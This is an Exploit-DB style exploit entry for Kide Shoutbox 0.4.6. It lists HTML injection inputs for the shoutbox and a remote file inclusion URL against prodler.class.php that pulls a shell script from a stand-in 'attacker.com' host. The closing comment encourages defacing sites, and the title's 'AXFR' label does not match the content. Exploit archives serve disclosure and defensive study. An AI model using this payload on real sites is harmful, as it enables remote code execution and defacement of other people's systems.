Kide Shoutbox 0.4.6 - Cross-Site Scripting / AXFR

Author: andresg888
type: webapps
platform: php
port: 
date_added: 2009-12-01 
date_updated:  
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comkide-unzip.zip

##########################[andresg888]##########################
#Web: : www.ilegalintrusion.net<http://www.ilegalintrusion.net> & www.bl4ck-p0rtal.org<http://www.bl4ck-p0rtal.org>
########################################################################
#Exploit :
# Go to the shoutbox and type:
# <font color="red">red text</font>
# or
# <marquee>hi</marquee>
# or
#
########################################################################
#3xplo!t :
#http://server/[path]/include/prodler.class.php?sPath=http://attacker.com/shell.txt???
########################################################################
#Greetz : _84kur10_ , Brunos_50
#Special Thanks : all members from ilegalintrusion & black-portal
########################################################################
# It is obvious that if you allow javascript or html injection code can make a document.Inner
# so with a little imagination could Defacer the site with a script.
###########################[andresg888#################################